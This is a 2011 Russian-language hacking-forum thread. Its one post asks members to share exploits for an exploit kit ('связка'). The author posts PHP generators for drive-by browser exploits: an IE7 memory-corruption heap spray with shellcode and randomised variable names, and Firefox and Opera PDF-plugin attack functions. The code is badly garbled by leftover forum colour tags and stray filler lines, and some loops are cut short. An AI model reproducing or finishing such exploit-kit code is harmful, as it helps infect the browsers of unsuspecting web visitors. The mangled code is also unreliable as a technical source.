HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.10.2011, 12:43
GibridMelody
Guest
Сообщений: n/a
Провел на форуме:
724

Репутация: 13
По умолчанию

Предлогаю выкладывать сдесь актуальные сплойты которые можно воткнуть в связку.

Начну пожалуй:

IE 7

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]mem_cor[/COLOR][COLOR="#007700"]() {[/COLOR][COLOR="#0000BB"]$memcor_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_random_string_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'15'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]' var '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$memcor_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = unescape('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_shellcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mem_cor[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'); var '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$memcor_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = new Array(); var '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$memcor_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = 0x100000-('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$memcor_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.length*2+0x01020); var '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$memcor_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = unescape("%u0C0C%u0C0C"); while('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$memcor_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.length



Loremipsumdoloregkuw

Loremipsumdoloregkuwiert

Loremikdkw

var '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$font_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_shellcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Font_FireFox[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]';

var '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$font_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = unescape('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$font_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]');

var '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$font_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = unescape("%u0c0c%u0c0c");

while ('
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$font_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.length 0)

while (i

'
[/COLOR][COLOR="#007700"];

return[/
COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"];

}[/
COLOR][/COLOR
FireFox PDF

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]
[/
COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]]function[/COLOR][COLOR="#0000BB"]pdf_ff[/COLOR][COLOR="#007700"]()

{

global[/
COLOR][COLOR="#0000BB"]$pdf[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$pdf_ff_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_random_string_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'5'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'

function '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_ff_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'()

{

var '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_ff_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = false;

try

{if( navigator.plugins && navigator.mimeTypes.length)

{for( var '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_ff_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = 0; '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_ff_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' \');



}

else return false;

}

'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_ff_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'();

'
[/COLOR][COLOR="#007700"];

return[/
COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"];

}

[/
COLOR][/COLOR
Opera PDF

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]
[/
COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]]function[/COLOR][COLOR="#0000BB"]pdf_op[/COLOR][COLOR="#007700"]()

{

global[/
COLOR][COLOR="#0000BB"]$pdf[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$pdf_op_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_random_string_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'5'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'

function '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_op_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'()

{

var '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_op_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = false;

try

{

if( navigator.plugins && navigator.mimeTypes.length)

{for( var '
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_op_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' = 0; '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_op_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]' \');

}

else return false;

}

'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pdf_op_name[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'();

'
[/COLOR][COLOR="#007700"];

return[/
COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"];

}[/
COLOR][/COLOR
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ